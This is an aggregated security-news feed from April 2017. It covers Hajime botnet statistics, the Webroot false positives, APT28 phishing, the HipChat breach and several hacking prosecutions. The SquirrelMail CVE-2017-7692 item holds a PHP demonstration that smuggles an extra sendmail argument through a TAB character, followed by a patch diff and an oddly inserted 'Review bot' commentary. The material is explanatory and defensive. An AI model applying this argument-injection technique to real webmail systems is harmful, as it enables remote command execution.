Our honeypot registered 2,593 successful telnet Hajime attacks in 24 hours. 2,540 of them were from unique IP addresses, 949 hosts provided a payload and 528 had an active web server running at port 80/tcp.
Distribution of attackers by country
Vietnam 509 20.04%
Taiwan 327 12.87%
Brazil 227 8.94%
Turkey 167 6.57%
Korea 150 5.91%
India 141 5.55%
China 97 3.82%
Russia 72 2.83%
Romania 69 2.72%
Colombia 58 2.28%
Mexico 54 2.13%
Others 669 26.34%
Total 2540
Victim device web server analysis
The HTTP server version is typically shown in the HTTP server response headers. After a little analysis we see that most of the victims turn out to be DVRs, followed by web cameras, routers, etc.
HTTP header "Server" statistics
364 Server: uc-httpd 1.0.0
43 Server: WCY_WEBServer/2.0
9 Server: Boa/0.94.14rc21
4 Server: thttpd/2.25b-lxc 29dec2003
3 Server: Router Webserver
2 Server: GoAhead-Webs
2 Server: JAWS/1.0 May 26 2014
2 Server: nginx/1.4.4
1 Server: DNVRS-Webs
1 Server: IPCamera-Webs
1 Server: IPCamera-Webs/2.5.0
1 Server: JAWS/1.0 Aug 21 2013
1 Server: JAWS/1.0 Jul 9 2013
1 Server: JAWS/1.0 Jun 13 2013
1 Server: JAWS/1.0 Jun 25 2013
1 Server: JAWS/1.0 Mar 20 2014
1 Server: JAWS/1.0 May 13 2013
1 Server: Microsoft-IIS/7.5
1 Server: Web server
1 Server: WebServer
Web interface “title” statistics
315 NETSurveillance WEB
84 WEB SERVICE
37 NETSuveillance WEB
36 IVSWeb 2.0 – Welcome
21 (empty title)
9 main page
6 NEUTRON
4 WEB SURVEILLANCE
3 CPPLUS DVR –Web View
2 IVSWeb 2.0 – Добро пожаловать
2 IVSWEB_TITLE – IVSWEB_LOGIN_TITLE
2 replace
1 CPPLUS DVR–Web View
1 GIGA Security
1 IIS7
1 iProview Web 2.0 – Welcome
1 IVSWeb 2.0 – Hoş geldiniz
1 IVSWeb 2.0 – Witamy
1 WATASHI SERVICE
Geography of infected peers as DHT seeders
Throughout the research period, at least 15,888 unique infected boxes were revealed, though this number is not very accurate. All of them were seeding Hajime config.
Distribution of infected boxes by country
Iran 2285 14.38%
Vietnam 1819 11.45%
Brazil 1102 6.94%
Turkey 911 5.73%
China 909 5.72%
Taiwan 805 5.07%
Russia 747 4.70%
India 642 4.04%
Korea 624 3.93%
Mexico 542 3.41%
Others 5502 34.63%
Total 15888
GeoIP of infected peers as DHT leechers
This method revealed 297,499 unique infected hosts during the research period. All of them were requesting Hajime config.
Distribution of leechers by country
Iran 58465 19.65%
Brazil 26188 8.80%
Vietnam 23418 7.87%
Russia 22268 7.49%
Turkey 18312 6.16%
India 16445 5.53%
Pakistan 14069 4.73%
Italy 10530 3.54%
Taiwan 10486 3.52%
Australia 9436 3.17%
Others 87882 29.54%
Total 297499
Conclusion
The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity. And maybe this will never happen, because every time a new configuration file is downloaded, a piece of text is displayed through stdout while the new configuration is being processed:
Example message:
Whether the author’s message is true or not remains to be seen. Nevertheless, we advise owners of IoT devices to change the password of their devices to one that’s difficult to brute force and to update the firmware if possible.
Kaspersky Lab products detect this threat as Backdoor.Linux.Hajime.
Appendix
Hardcoded IP subnetworks avoided by Hajime:
85.159.0.0/16 Ukraine; Region Vinnyts’ka Oblast’
109.201.0.0/16 Iran, Islamic Republic of; Region Tehran
77.247.0.0/16 Germany Virtela Communications Inc Amsterdam, NL POP
169.255.0.0/16 South Africa; Region Gauteng
0.0.0.0/8 IANA – Local Identification
3.0.0.0/8 General Electric Company
15.0.0.0/8 Hewlett-Packard Company
16.0.0.0/8 Hewlett-Packard Company
56.0.0.0/8 US Postal Service
224.0.0.0/4 Multicast
United States Department of Defense:
6.0.0.0/8
7.0.0.0/8
11.0.0.0/8
21.0.0.0/8
22.0.0.0/8
26.0.0.0/8
28.0.0.0/8
29.0.0.0/8
30.0.0.0/8
33.0.0.0/8
55.0.0.0/8
214.0.0.0/8
215.0.0.0/8
Private networks:
192.168.0.0/16
172.16.0.0/12
127.0.0.0/8
10.0.0.0/8
100.64.0.0/10
198.18.0.0/15
Webroot 'mistakenly' flags Windows as Malware and Facebook as Phishing site
25.4.2017 thehackernews Vulnerability
Popular antivirus service Webroot mistakenly flagged core Windows system files as malicious and even started temporarily removing some of the legit files, trashing user computers around the world.
The havoc was caused after the company released a bad update on April 24, which was pulled after approximately 15 minutes. But that still hasn't stopped some PCs from receiving it, causing serious issues not just for individuals, but also for companies and organizations relying on the software.
Webroot even Blocked Facebook
According to reports by many customers on social media and Webroot's forum, hundreds and even thousands of systems broke down after the antivirus software flagged hundreds of benign files needed to run Windows and the apps that run on top of the operating system.
The faulty update even caused the antivirus to incorrectly block access to Facebook after flagging the social network service as a phishing website, preventing users from accessing the social network.
"Webroot has not been breached and customers are not at risk," the company said on its online forum. "Legitimate malicious files are being identified and blocked as normal."
What all went Wrong?
The buggy update caused Webroot anti-virus service to detect legitimate Windows files, including those signed by Microsoft, as W32.Trojan.Gen files – generic malware, in other words.
This behavior eventually moved critical Windows system files, essential to the operating system's effective functioning, into quarantine, making them unavailable to Windows and rendering hundreds of thousands of computers unstable.
Files associated with some applications were also flagged as malicious and quarantined.
Webroot is Working on a Universal Fix
Webroot, which claimed to have over 30 million customers last year, has suggested fixes for those using the Home edition and Business edition of its anti-virus software.
The company's technical team also moved quickly and pushed a fix for the Facebook issue last night, according to the post on the company's forum.
However, the company has yet to provide a definitive fix for its entire affected user base. The company confirms that it's "currently working on this universal solution now," but did not say when it would arrive.
What Affected Users should do
Meanwhile, the company has provided workarounds to restore files and prevent its antivirus from re-detecting the same Windows files as W32.Trojan.Gen, though it is only useful for home edition users and not for managed services providers (MSPs).
However, one user on Webroot's forum is reporting that uninstalling Webroot, restoring the quarantined files from a backup drive, and then reinstalling Webroot fixes the issue.
French Presidential Candidate Targeted by Russia-Linked Hackers
25.4.2017 securityweek CyberSpy
A notorious cyber espionage group linked to the Russian government has targeted the political party of French presidential candidate Emmanuel Macron, according to a report published on Tuesday by Trend Micro.
The news comes shortly after Macron won the first round of France's presidential election. Many believe he will become the country's next president after he was endorsed by several top politicians, including former opponents in the presidential race.
Trend Micro’s report describes the activities of the threat actor known as Pawn Storm, APT28, Fancy Bear, Sofacy, Sednit and Strontium. Researchers have identified tens of military, government, defense, media, political, religious, educational and international organizations targeted by the group.
An analysis of the phishing domains used by the hackers suggests that one of the targets was Macron's campaign. The attackers registered the domain onedrive-en-marche.fr, which is similar to en-marche.fr, the official website of Macron's En Marche! party, likely in an effort to get users to hand over their credentials.
Macron’s campaign has confirmed for The Wall Street Journal that staffers received phishing emails, but claimed the hacking attempts had failed. The National Cybersecurity Agency of France (ANSSI) also confirmed the attacks, but refused to comment on their origin, Reuters reported.
A representative of En Marche! has accused Russia of interfering with the elections in an effort to help pro-Moscow candidates, but Russia has denied any involvement in the hacker attacks.
According to Trend Micro, the En Marche phishing site was set up in mid-March. The security firm also discovered a phishing domain apparently set up to target the Konrad-Adenauer-Stiftung (KAS) political foundation in Germany. The KAS phishing site, named kassap.de, was created in early April.
Last year, Trend Micro also reported seeing a Pawn Storm attack aimed at Germany’s Christian Democratic Union, the political party of Chancellor Angela Merkel.
Pawn Storm’s political operations have made a lot of headlines, particularly after the group targeted organizations affiliated with the Democratic Party in the United States. The U.S. officially accused Russia of launching the cyberattacks, and authorities confirmed recently that an investigation is underway to determine if the attacks had an impact on this year’s presidential elections.
Trend Micro pointed out in its report that Pawn Storm has often relied on so-called false flag operations. Individuals and groups claiming to be hacktivists have taken credit for several of the attacks attributed to Pawn Storm.
For instance, an individual using the online moniker Guccifer 2.0 has taken credit for the Democratic Party attacks, and a group calling itself Fancy Bears claimed to have been behind the attack on the World Anti-Doping Agency (WADA). Several other “hacktivist” groups have been connected to Pawn Storm, including Cyber Caliphate, which claimed to be linked to ISIS when it attacked the U.S. Army and French TV station TV5Monde back in 2015.
Atlassian's HipChat hacked, user data and private messages compromised
25.4.2017 thehackernews Hacking
Atlassian's group chat platform HipChat is notifying its users of a data breach after some unknown hacker or group of hackers broke into one of its servers over the weekend and stole a significant amount of data, including group chat logs.
What Happened?
According to a security notice published on the company's website today, a vulnerability in a "popular third-party" software library used by its HipChat.com service allowed hackers to break into its server and access customer account information.
However, HipChat did not say exactly which programming blunder the hackers exploited to get into the HipChat cloud server.
What type of Information?
Data accessed by the hackers include user account information such as customers' names, email addresses and hashed password information.
Besides information, attackers may have obtained metadata from HipChat "rooms" or groups, including room name and room topic. While metadata is not as critical as direct messages, it's still enough to identify information that's not intended to be public.
Worse yet, the hackers may also have stolen messages and content in chat rooms, but in a small number of instances (about 0.05%). There has been no sign that over 99% of users' messages or room content was compromised.
Fortunately, there's no evidence that the attackers have accessed anyone's credit card or financial information.
Who are not affected?
HipChat users not connected to the affected third-party software library are not affected by the data breach.
Other Atlassian properties also are safe, as the company claimed that there is no evidence to suspect that other Atlassian systems or products like Jira, Confluence, or Trello have been affected by the hack.
To Worry or Not to Worry?
There's no need to panic, as the passwords that may have been exposed in the breach would also be difficult to crack.
Atlassian Chief Security Officer Ganesh Krishnan noted that HipChat hashes all passwords using the bcrypt cryptographic algorithm, with a random salt.
The data is hashed with bcrypt, which transforms the passwords into a set of random-looking characters, and makes the hashing process so slow that it would literally take centuries to brute-force all of the HipChat account passwords.
For added security, HipChat also "salted" each password with a random value before hashing it, adding additional protection against possible decryption.
However, data breaches like this are made worse by the fact that there have been so many breaches prior to it, and that the majority of users reuse the same or similar passwords across their accounts.
So, it doesn't take much for hackers to cross reference a user's username or email address in a database from a previous breach and find an old password, placing users at greater risk of a hack.
How Many victims?
HipChat did not say how many users may have been affected by the incident, but the company is taking several proactive steps to secure its users.
What is HipChat doing?
As a precaution, HipChat has invalidated passwords on all potentially affected HipChat-connected accounts, and emailed password reset instructions, forcing every user to reset their account password.
The company is also attempting to track down and fix the security vulnerability in the third-party library used by its service that allowed for the breach.
In response to the attack, the company is also preparing an update for HipChat Server that will be shared with its customers directly through the standard update channel.
HipChat has also isolated the affected systems and closed any unauthorized access.
HipChat parent company Atlassian is also actively working with law enforcement on the investigation of this matter.
What Should You Do Now?
For obvious reasons, all HipChat customers are strongly advised to change their passwords as soon as possible.
You should also be particularly alert to phishing emails, which are usually the next step for cyber criminals after a breach. Phishing is designed to trick users into giving up further details such as passwords and bank information.
Webroot started tagging Windows files, Facebook as malicious after a faulty update
25.4.2017 Securityaffairs Vulnerability
Webroot home and business products are tagging Windows files and Facebook as malicious after a recent faulty update. Users are going crazy.
The Webroot home and business defense solutions started tagging legitimate Windows and Facebook as malicious after a recent update.
Many organizations reported hundreds and even thousands of malfunctioning endpoints. The glitch caused the Webroot product to detect legitimate Windows files, including digitally signed ones, as W32.Trojan.Gen.
Many customers reported the embarrassing problem online, through social media and Webroot's forum, complaining of serious problems for their businesses.
Files tagged as malicious by Webroot were quarantined, causing serious problems for end users.
Limbaughnomicon @Limbaughnomicon
@Webroot @WebrootSupport This false positive issue is driving me insane. As an MSP, a true nightmare. No quarantine restores work. HELP!
3:25 AM - 25 Apr 2017
Bob Ripley @M5_Driver
@Webroot I seem to have installed a nasty Ransomware app. It's called Webroot. They already have my money, should I contact the FBI?
12:13 AM - 25 Apr 2017
The update also caused the Webroot security product to block access to Facebook, as reported by many users on Twitter: the antivirus flagged the popular social network as a phishing website.
Keith Sieman @KeithSieman
> Tfw @Webroot gives you a link to their @facebook page on the very same screen that's blocking access to Facebook... 🙃
3:13 AM - 25 Apr 2017
The company published an official statement to reassure its customers, explaining that its systems had not been attacked.
“We are still working to resolve this issue through the night and will keep you updated as soon as more information becomes available.” read the message shared by Webroot on its forum.
“Webroot has not been breached and customers are not at risk. Legitimate malicious files are being identified and blocked as normal. We continue to work on a comprehensive resolution, but a live fix has been released for the Facebook issue and is propagating through to customers now.”
Webroot has provided a workaround solution for small business customers, unfortunately, managed services providers (MSPs) have to wait to fix the problem.
The company also provided a fix for the Facebook problem.
“We understand that this is a consumer and business issue. For our small business customers, the fix below will work.
We understand that MSPs will require a different solution. We are currently working on this universal solution now.” continues the company.
Experts highlighted that this is the second incident involving Webroot products this year, a faulty update issued in February caused many systems to crash.
Are you thinking of changing products?
You should probably know that similar problems have affected products from other IT security giants such as Norton and ESET.
The Chrome web browser contains dangerous holes
25.4.2017 Novinky/Bezpečnost Vulnerabilities
Users of the Chrome web browser should be on their guard. It contains dangerous security holes that computer pirates could exploit. Fortunately, the new version of the browser fixes all of the discovered bugs.
A total of 29 security holes were discovered in Chrome before the new version was released. Three of them were rated as "high" severity. Cybercriminals could exploit these bugs to smuggle practically any malicious code onto a computer, and likewise to access the settings of the compromised machine or the data stored on its hard disk.
In theory, computer pirates could also exploit eight bugs labelled "important". These, however, are not expected to be exploited on a massive scale in practice, as is the case with high-severity security flaws.
Don't delay the installation
The remaining updates mainly serve to improve the functionality of individual components of the browser. These important patches should therefore not pose any major security risk to users.
Given the possible risks, users should not delay installing the Chrome update. The fixes can be downloaded via automatic updates.
The update can be installed manually through the Help menu, specifically under "About Chrome". Once that item is opened, the user is automatically offered installation of the latest version.
Bug hunters earned hundreds of thousands
It is worth noting that most of the holes were discovered by so-called bug hunters, i.e. hackers who are rewarded for the flaws they find. Chrome's developers paid them 14,000 dollars for this, roughly 350,000 Czech crowns.
The largest reward went to the computer experts who discovered a hole in the PDFium library. That very bug is rated "high" severity. For that single bug the hunters received 3,000 dollars, more than 74,000 crowns.
Apple began luring hackers to find bugs in a similar way last year.
Hackers linked to Russia tried to steal Macron's passwords, Japanese firm confirms
25.4.2017 ČT24 BigBrother
The head of the digital section of Macron's campaign confirmed that the staff of the winner of the first round of the French presidential election was subjected to attacks by hackers linked to Russia. The electronic espionage was uncovered by the Japanese antivirus company Trend Micro. All of the attacks were reportedly repelled. Moscow rejects the accusations.
The attacks were allegedly the work of the Pawn Storm group, which, according to US intelligence services, is run by Russian espionage. The attacks were already recorded last December, but at that time Macron's staff had no evidence of their origin.
Trend Micro's independent report now lists 160 attempts at electronic espionage against various targets. For instance, the hackers tried to obtain passwords to the accounts of members of Macron's campaign staff.
Macron emerged from the government that imposed sanctions on Moscow over Ukraine and refused to deliver warships that had already been paid for. Of all the candidates, the politician also defends the EU most vocally.
French experts closely monitored any signs of cyberattacks on the first round of the election. As early as January, French Defence Minister Le Drian warned that the number of cyberattacks aimed at France had risen dramatically over the past three years.
Many feared a repeat of the American scenario. US intelligence services had earlier announced that the campaign meant to influence last year's presidential election was ordered directly by Russian President Vladimir Putin. Its aim was to undermine the democratic process in the country and smear the Democratic presidential candidate Hillary Clinton. Moscow rejects this and speaks of "absurd accusations without evidence".
French Foreign Minister Jean-Marc Ayrault warned that any foreign interference in the election could be met with retaliation. "We will not accept any interference in our electoral process, whether from Russia or from any other state," the head of diplomacy stressed in mid-February.
In the French case, too, Russia denies having anything to do with the hackers. "It is out of the question that Moscow played a role in these attacks, whether or not they took place. And any accusations that Moscow played some role in this are absurd," said Kremlin spokesman Dmitry Peskov.
Concerns persist ahead of the second round of the French election, scheduled for 7 May, in which Macron faces far-right leader Marine Le Pen. She praises Putin and has said that France should recognise Crimea as part of the Russian Federation. Years ago her National Front received a loan of nine million euros (249 million crowns) from the First Czech-Russian Bank, which caused an uproar in Europe.
Sleuth Rafael Rivera reveals that system files contain a good deal of unneeded metadata
25.4.2017 Cnews.cz Security
The metadata contributes nothing to the user experience, and Windows does not need it either.
Developer Rafael Rivera has once again set about exploring Windows; in fact, he never stopped. First he wrote a tool that searches executable files for metadata belonging to Adobe's XMP platform, which is found in PNG images. He then used the tool to scan an original Windows 10 image; he did not state the version, but no major differences are to be expected. Surprisingly, he found that the metadata is present in a number of system files.
Executables and libraries can contain images. Sometimes metadata is useful, e.g. when it records where photos were taken, which makes them easier to sort. In a product like Windows, however, the need for such metadata is highly questionable.
On the contrary, this metadata consumes system resources and takes up space. It makes up a surprisingly large part of some files: 20% of the size of explorer.exe, which belongs to File Explorer and is one of the basic components. The ApplicationFrame.dll library, which among other things handles the rendering of application title bars, is as much as 41% unneeded metadata.
Windows could be even better optimized, as Rivera showed (illustrative photo)
These examples hint at the direction future Windows optimizations could take. According to Rivera, Microsoft has several ways to get rid of the redundant content. He argues that removing it need not be as insignificant as we might think. Microsoft has been trying for several years to squeeze the best possible performance out of Windows (the Windows kernel now runs on smartphones too) and optimizes wherever it can to extend device battery life.
Rivera further states that, according to a manager who formerly worked on the Internet Explorer team, the Edge development team today uses tools that strip unneeded parts from the code, including the metadata in question. They also optimize images with the Zopfli algorithm. That is one reason why Edge is so fast. Removing metadata that contributes nothing to the user experience would at the very least do no harm.
Hacker Track2 makes history: 27 years in prison for his attacks
25.4.2017 Živě.cz Crime
Russian hacker Roman Seleznev, who attacked payment terminals at large financial institutions and small shops alike, has been sentenced in the United States to 27 years in prison. In the attacks he stole payment card details and other sensitive data, causing damages totalling 169 million dollars (155.78 million euros), Ars Technica reports.
The attacker, who went by the handle "Track2", was arrested back in 2014 in the Maldives. At the time he had with him a laptop containing 1.7 million credit card numbers.
After the trial, the Russian was charged in August 2016 with 38 violations of the law, including wire fraud, intentional damage to a protected computer and aggravated identity theft.
Prosecutor: He deserves a harsh sentence
The US government sought 30 years in prison for Seleznev. Federal prosecutor Annette Hayes said the Russian hacker deserves a harsh sentence because he is a pioneer who helped launch the trade in stolen credit card data. She added that Seleznev became one of the most respected figures of the criminal underworld.
The trial of the 32-year-old criminal took place in Seattle, where he had successfully attacked several businesses in the past. Among them was the Broadway Grill restaurant, whose representatives said the hacking attack was one of the reasons they had to close in 2013.
The case drew the attention of the world media. The father of the convicted Roman Seleznev is Valery Seleznev, a member of the Russian State Duma who is considered a close political ally of President Putin. Valery Seleznev called his son's extradition to the USA a kidnapping. The American side took advantage of the hacker travelling from Russia on holiday to the Maldives: it reached an agreement with the local authorities, who intervened. That is how he ended up in the USA and before a court.
Seleznev: I had a difficult childhood
In his defence the attacker handwrote an 11-page letter addressed to the federal court. In it he described the difficult conditions in which he grew up in the city of Vladivostok. By his own account, at the age of seventeen he witnessed the death of his mother, who died of alcohol poisoning.
He also mentioned the 2011 terrorist attack in Morocco, in which he was seriously injured and suffered permanent damage. The lengthy recovery reportedly took a toll on his private life as well, as his wife divorced him. Seleznev concluded the letter by expressing the will to make amends, as far as possible, for the damage he had caused.
The 27-year sentence is the longest ever handed down in US history in connection with a hacking attack. The Russian side considers it disproportionate, and voices there call it a political provocation by the USA. The convicted man's deadline for appealing to a higher court is now running; he has not yet done so.
Webroot Tags Windows Files, Facebook as Malicious
25.4.2017 securityweek Vulnerability
An update released by Webroot has caused the company’s home and business products to flag legitimate files and websites as malicious.
While the faulty update was only available for less than 15 minutes on Monday, many customers took to social media and Webroot’s forum to complain that it had caused serious problems for their organization. Users reported that hundreds and even thousands of their endpoints were affected.
The update caused Webroot to detect legitimate Windows files, including files signed by Microsoft, as W32.Trojan.Gen. Users also reported that files associated with some of their applications had been flagged as malicious and quarantined.
Limbaughnomicon @Limbaughnomicon
@Webroot @WebrootSupport This false positive issue is driving me insane. As an MSP, a true nightmare. No quarantine restores work. HELP!
3:25 AM - 25 Apr 2017
The update also caused the antivirus to block access to Facebook after flagging the service as a phishing website.
“Webroot has not been breached and customers are not at risk. Legitimate malicious files are being identified and blocked as normal,” Webroot said on its forum.
The company has provided a workaround for small business customers, but there is still no solution for managed services providers (MSPs). A fix has also been pushed out for the Facebook issue.
“We understand that MSPs will require a different solution,” Webroot said. “We are currently working on this universal solution now.”
This is the second buggy update released by Webroot this year. An update rolled out in February caused many systems to crash.
Webroot is not the only security firm whose products have caused problems for users. Buggy updates were also released in the past by ESET, Panda Security, Norton and other antivirus vendors.
Squirrelmail 1.4.22 is affected by a Remote Code Execution flaw, no fix is available
25.4.2017 securityaffairs Vulnerability
The popular PHP webmail package SquirrelMail is affected by a remote code execution vulnerability tracked as CVE-2017-7692.
The popular PHP webmail package SquirrelMail is affected by a remote code execution vulnerability tracked as CVE-2017-7692, that could be exploited by hackers to execute arbitrary commands on the target and fully control it.
The latest version, 1.4.22, and earlier versions of the package are affected by the vulnerability.
The issue was discovered by the well-known security researcher Dawid Golunski from Legal Hackers, who reported it to the project's maintainers in January.
Dawid Golunski @dawid_golunski
[Advisory] SquirrelMail <=1.4.22 Auth. Remote Code Exec #exploit #0day #cybersecurity #infosec #vuln #hacking #rce https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
8:44 PM - 23 Apr 2017
You may remember Golunski as the expert who discovered other RCE flaws in the email libraries PHPMailer and SwiftMailer.
Although the maintainers have been informed of the issue, it is still unclear if and when the problem will be solved.
The vulnerability stems from insufficient escaping of user-supplied data when the package is configured with Sendmail as its main transport.
“SquirrelMail is affected by a critical Remote Code Execution vulnerability which stems from insufficient escaping of user-supplied data when SquirrelMail has been configured with Sendmail as the main transport,” wrote Golunski in a security advisory. “An authenticated attacker may be able to exploit the vulnerability to execute arbitrary commands on the target and compromise the remote system.”
Sendmail is a popular mail transfer agent that is configured as the default in many email environments.
When configured to use Sendmail, SquirrelMail fails to account for a character that attackers can use to inject additional parameters.
“SquirrelMail allows authenticated users to control envelopefrom (Return-Path) address through the webmail web interface.” continues Golunski.
“As we can see it calls str_replace() to sanitize the user input to prevent injection of additional parameters to the sendmail command.
Unfortunately it does not take into account \t (TAB) character which can be used by attackers to inject additional parameters.”
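To make the mechanism concrete, here is an added PHP example (not SquirrelMail's own code) that builds the sendmail command the vulnerable way and the way the unofficial patch does, then runs both through the shell with printf standing in for the sendmail binary (an assumption, so nothing is mailed) and counts the arguments each produces. The `--injected` token is a constructed placeholder, not a real sendmail option; the demo assumes a POSIX shell.

```php
<?php
// Added example, not SquirrelMail's code. It reproduces the command
// construction from Deliver_SendMail.class.php in two forms and lets the
// shell show how many arguments each form actually hands to the program.

/** SquirrelMail's original sanitization: strips NUL and LF, nothing else. */
function sanitize_envelopefrom(string $envelopefrom): string
{
    return str_replace(["\0", "\n"], ['', ''], trim($envelopefrom));
}

/**
 * Vulnerable form: escapeshellcmd() over the whole command string.
 * escapeshellcmd() escapes shell metacharacters but leaves whitespace
 * (including TAB) untouched, so a TAB inside $envelopefrom becomes an
 * argument separator when the shell parses the string.
 */
function build_command_vulnerable(string $path, string $args, string $envelopefrom): string
{
    $envelopefrom = sanitize_envelopefrom($envelopefrom);
    return escapeshellcmd("$path $args -f$envelopefrom");
}

/**
 * Fixed form, same pattern as the unofficial patch: the admin-controlled
 * prefix goes through escapeshellcmd(), the user-controlled address through
 * escapeshellarg(), which single-quotes it so it stays exactly one argument.
 */
function build_command_fixed(string $path, string $args, string $envelopefrom): string
{
    $envelopefrom = sanitize_envelopefrom($envelopefrom);
    return escapeshellcmd("$path $args -f") . escapeshellarg($envelopefrom);
}

/**
 * Runs the command through the shell and returns the argv the program saw.
 * The stand-in program is "printf %s," which echoes every argument it
 * receives followed by a comma, so the output can be split back into argv.
 */
function observed_argv(string $command): array
{
    $stream = popen($command, 'r');
    $out = stream_get_contents($stream);
    pclose($stream);
    return explode(',', rtrim($out, ','));
}

// Constructed input: a plausible address, then a TAB and an extra token.
// "--injected" is a placeholder, not a real sendmail option.
$path         = 'printf %s,';   // assumption: stand-in for /usr/sbin/sendmail
$args         = '-i -t';        // SquirrelMail's default sendmail_args
$envelopefrom = "user@example.com\t--injected";

$vulnerable = observed_argv(build_command_vulnerable($path, $args, $envelopefrom));
$fixed      = observed_argv(build_command_fixed($path, $args, $envelopefrom));

printf("vulnerable: %d args -> %s\n", count($vulnerable), json_encode($vulnerable));
printf("fixed:      %d args -> %s\n", count($fixed), json_encode($fixed));
// Expected: the vulnerable form yields 4 arguments (the TAB split
// "--injected" off as its own option); the fixed form yields 3, with the
// TAB and the trailing token still inside the single -f argument.
```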
The advisory includes proof-of-concept code that injects parameters pointing Sendmail at a malicious configuration file, which is uploaded as an attachment to trigger the RCE flaw.
The PoC code contains payloads for file write and remote code execution.
Golunski decided to release the PoC code after Filippo Cavallarin, CEO of security firm Segment, disclosed the same vulnerability on the Full Disclosure mailing list.
Cavallarin also shared the following unofficial patch for the above issue:
BOF
diff -ruN squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php
squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php
--- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 2011-01-06 02:44:03.000000000 +0000
+++ squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php 2017-04-18
11:42:26.505181944 +0000
@@ -93,9 +93,9 @@
$envelopefrom = trim($from->mailbox.'@'.$from->host);
$envelopefrom = str_replace(array("\0","\n"),array('',''),$envelopefrom);
// save executed command for future reference
- $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";
+ $this->sendmail_command = escapeshellcmd("$sendmail_path $this->sendmail_args -f") .
escapeshellarg($envelopefrom);
// open process handle for writing
- $stream = popen(escapeshellcmd($this->sendmail_command), "w");
+ $stream = popen($this->sendmail_command, "w");
return $stream;
}
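Review bot: the fix is correct for the reason the advisory gives: escapeshellcmd() escapes shell metacharacters but not whitespace, so the old `popen(escapeshellcmd($this->sendmail_command), "w")` let a TAB inside $envelopefrom start a new argument, whereas escapeshellarg() single-quotes the whole address into exactly one argument, and the new line `$stream = popen($this->sendmail_command, "w");` correctly drops the second escapeshellcmd() pass that would otherwise mangle those quotes. Two follow-ups: the preceding `str_replace(array("\0","\n"),array('',''),$envelopefrom);` line is now redundant for shell safety but harmless to keep, and since the address is user-controlled it would be stronger defense in depth to reject any envelope-from value containing whitespace or other non-address characters before it reaches this code at all. Note that escapeshellcmd() is still applied only to the `$sendmail_path $this->sendmail_args -f` prefix, which is appropriate because those values come from the administrator's configuration, not from the user.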
EOF
Golunski suggests that SquirrelMail users switch to a non-Sendmail transport, such as SMTP.
Denmark blames Russia's APT28 group for cyber intrusions into Defense Ministry emails
25.4.2017 securityaffairs APT
Denmark on Monday denounced Russia after the publication of a report that accused Russian APT28 of hacking the defense ministry’s email accounts.
Today the Danish Government officially blamed Russia for cyber attacks against its Defense Ministry, denouncing an intrusion into several Defense Ministry email accounts. The accusation comes after the Centre for Cyber Security published a report on Sunday accusing a Russian APT group of a breach that affected the emails of defense ministry employees in 2015 and 2016.
“This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia,” Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.
According to the Ministry, the emails don’t contain secret information, but the intrusion represents a serious threat to the state.
“The hacked emails don’t contain military secrets, but it is of course serious,”
According to the report, hackers belonging to the notorious APT28 group (also known as Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team) were responsible for the cyber espionage campaign that targeted the Danish Defense Ministry.
The APT28 group was also involved in many other attacks against a number of European states, including Germany and France.
In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained “very high”.
US authorities indicted the suspected operator of the Kelihos Botnet
25.4.2017 securityaffairs BotNet
The Russian hacker Petr Levashov has been indicted in connection with the infamous Kelihos Botnet that was recently dismantled.
It isn’t a good period for Russian cyber criminals: last week Roman Valeryevich Seleznev, aka “Track2”, was sentenced to 27 years in prison after being convicted of causing $170 million in damage by hacking into point-of-sale systems.
Today the United States Department of Justice announced that Peter Yuryevich Levashov (36), also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov, was arrested a couple of weeks ago in Barcelona for his involvement with the infamous Kelihos botnet.
According to research conducted by Check Point, the malware landscape saw some interesting changes in the first part of 2017.
The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth place in the malware chart.
According to the DoJ statement, Levashov was charged last week with one count of causing intentional damage to a protected computer, one count of conspiracy, one count of accessing protected computers in furtherance of fraud, two counts of fraud in connection with email, one count of wire fraud, one count of threatening to damage a protected computer, and one count of aggravated identity theft.
“A federal grand jury in Bridgeport, Connecticut, returned an eight-count indictment yesterday charging a Russian National with multiple offenses stemming from his alleged operation of the Kelihos botnet – a global network of tens of thousands of infected computers, which he allegedly used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” reads the statement.
The DoJ says Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.
The indictment also alleges that the Russian hacker used the Kelihos botnet for spam campaigns advertising various criminal schemes, including pump-and-dump stock fraud.
“On April 10, 2017, the Justice Department announced that it had taken action to dismantle the Kelihos botnet.” states the DoJ.
“An indictment is merely an allegation, and a defendant is presumed innocent unless and until proven guilty beyond a reasonable doubt in a court of law.”
Kelihos Botnet Author Indicted in U.S.
24.4.2017 securityweek BotNet
The alleged author of the Kelihos botnet has been charged in an eight-count indictment returned by a federal grand jury in Bridgeport, Connecticut, after being arrested in Spain earlier this month.
Peter Yuryevich Levashov, 36, a Russian national also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov, was charged last week with one count of causing intentional damage to a protected computer, one count of conspiracy, one count of accessing protected computers in furtherance of fraud, one count of wire fraud, one count of threatening to damage a protected computer, two counts of fraud in connection with email, and one count of aggravated identity theft.
Levashov is accused of operating the Kelihos botnet, a global network of tens of thousands of infected computers. The botnet, which the Department of Justice says was dismantled earlier this month, was used in malicious activities such as the harvesting of login credentials, the distribution of bulk spam e-mails, and the spreading of ransomware and other malicious software.
The indictment also alleges that Levashov used the Kelihos botnet to send spam e-mails that advertise various criminal schemes, including pump-and-dump stock fraud (stocks were deceptively promoted to fraudulently increase their price).
